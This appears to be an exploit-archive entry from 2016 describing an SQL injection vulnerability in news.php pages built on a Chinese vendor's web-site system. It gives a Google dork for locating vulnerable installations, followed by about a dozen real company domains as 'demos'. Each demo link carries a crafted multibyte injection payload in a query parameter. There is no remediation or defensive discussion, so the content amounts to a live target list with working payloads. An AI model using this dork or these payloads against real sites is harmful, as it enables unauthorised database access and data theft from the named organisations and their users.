######################
# Exploit Title : Foshan Nanhai Dachang shelf Co. SQL injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.hotlon.com/
# Google Dork : intext:"火龙科技" news.php?cid=
# Date: 2016 21 October
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
# demos :
# http://www.dcshelf.com/gb/news.php?cid=1%c0%00xa7%c0%a2&lanmu=6
# http://www.pwceramic.com/gb/news.php?cid=33%c0%00xa7%c0%a2
# http://www.diamond.cn/gb/news.php?class_id=5%c0%00xa7%c0%a2
# http://www.chuangyizhongxin.org/gb/news.php?rid=3&ncid=7%c0%00xa7%c0%a2&cid=9
# http://www.jian-tong.com/gb/news.php?cid=3%c0%00xa7%c0%a2
# http://www.china-yuxi.cn/gb/news.php?cid=2%c0%00xa7%c0%a2
# http://www.wldmart.com/gb/news.php?cid=4%c0%00xa7%c0%a2
# http://www.gdjuying.com/gb/news.php?cid=2%c0%00xa7%c0%a2
# http://www.chuangyizhongxin.org/gb/news.php?rid=3&ncid=7%c0%00xa7%c0%a2&cid=9
# http://www.ccjjt.cn/gb/news.php?pageno=7&cid=1%c0%00xa7%c0%a2
# http://www.cimcpark.com/gb/news.php?pageno=4&ncid=1%c0%00xa7%c0%a2
# http://www.blueambre.com/gb/news.php?ncid=2%c0%00xa7%c0%a2
######################
# discovered by : modiret
#####################